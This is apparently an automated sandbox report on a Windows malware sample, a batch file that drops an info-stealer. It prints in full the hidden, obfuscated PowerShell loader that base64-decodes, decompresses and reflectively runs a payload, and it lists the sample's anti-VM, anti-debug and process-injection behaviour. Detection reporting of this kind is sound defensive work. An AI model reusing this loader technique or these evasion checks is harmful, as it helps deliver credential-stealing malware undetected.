Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596310	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596029	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595918	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595696	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595445	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595335	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594303	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593873	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593327	Jump to behavior

Source: 849128312.cmd.Fjz, 00000007.00000002.2223259743.0000000008FD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: 849128312.cmd.Fjz, 00000007.00000002.2171542081.0000000002C90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: 849128312.cmd.Fjz, 00000007.00000002.2211783683.00000000073EC000.00000004.00000020.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2209619324.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 780000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C48008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 780000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 782000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EC000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EE000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 570008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' \| Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() \| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz c:\users\user\desktop\849128312.cmd.fjz -windowstyle hidden -command "$kxrvrz = get-content 'c:\users\user\desktop\849128312.cmd' \| select-object -last 1; $rztxxaika = [system.convert]::frombase64string($kxrvrz);$jjvgcfjmzi = new-object system.io.memorystream( , $rztxxaika );$cheoysx = new-object system.io.memorystream;$vrypedkztmk = new-object system.io.compression.gzipstream $jjvgcfjmzi, ([io.compression.compressionmode]::decompress);$vrypedkztmk.copyto( $cheoysx );$vrypedkztmk.close();$jjvgcfjmzi.close();[byte[]] $rztxxaika = $cheoysx.toarray();[array]::reverse($rztxxaika); $nlmpmdzvlef = [system.appdomain]::currentdomain.load($rztxxaika); $hncpdnhhl = $nlmpmdzvlef.entrypoint; [system.delegate]::createdelegate([action], $hncpdnhhl.declaringtype, $hncpdnhhl.name).dynamicinvoke() \| out-null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz c:\users\user\desktop\849128312.cmd.fjz -windowstyle hidden -command "$kxrvrz = get-content 'c:\users\user\desktop\849128312.cmd' \| select-object -last 1; $rztxxaika = [system.convert]::frombase64string($kxrvrz);$jjvgcfjmzi = new-object system.io.memorystream( , $rztxxaika );$cheoysx = new-object system.io.memorystream;$vrypedkztmk = new-object system.io.compression.gzipstream $jjvgcfjmzi, ([io.compression.compressionmode]::decompress);$vrypedkztmk.copyto( $cheoysx );$vrypedkztmk.close();$jjvgcfjmzi.close();[byte[]] $rztxxaika = $cheoysx.toarray();[array]::reverse($rztxxaika); $nlmpmdzvlef = [system.appdomain]::currentdomain.load($rztxxaika); $hncpdnhhl = $nlmpmdzvlef.entrypoint; [system.delegate]::createdelegate([action], $hncpdnhhl.declaringtype, $hncpdnhhl.name).dynamicinvoke() \| out-null"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1532433
Product:	CloudBasic
Start time:	07:14:09
Start date:	13.10.2024
Sample:	849128312.cmd
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e5ca9d51a4b6e15d0dc86815068d1dd3
SHA1:	1844bf3c0f506e919ed1100e71dcb57c0a68201e
SHA256:	9dc121c5c9a9a1771a52101a2c664c622b23dfd1ad31ce6c1e92c902bebdb248

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hi5ebuqc.skg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xryabt.rdz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0184F867DE9A072AB7F6CA3E85EB9015	9421D263C962151E538C3268341CBA36B4D6CB3F	F1A66D9CB6D385333F97EBC8C4DE8F5DFC0C0F9F45F4BCFF5543D982B040B56A
C:\Users\user\Desktop\849128312.cmd.Fjz	PE32 executable (console) Intel 80386, for MS Windows	C32CA4ACFCC635EC1EA6ED8A34DF5FAC	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70

Windows Analysis Report
849128312.cmd

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report 849128312.cmd

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
849128312.cmd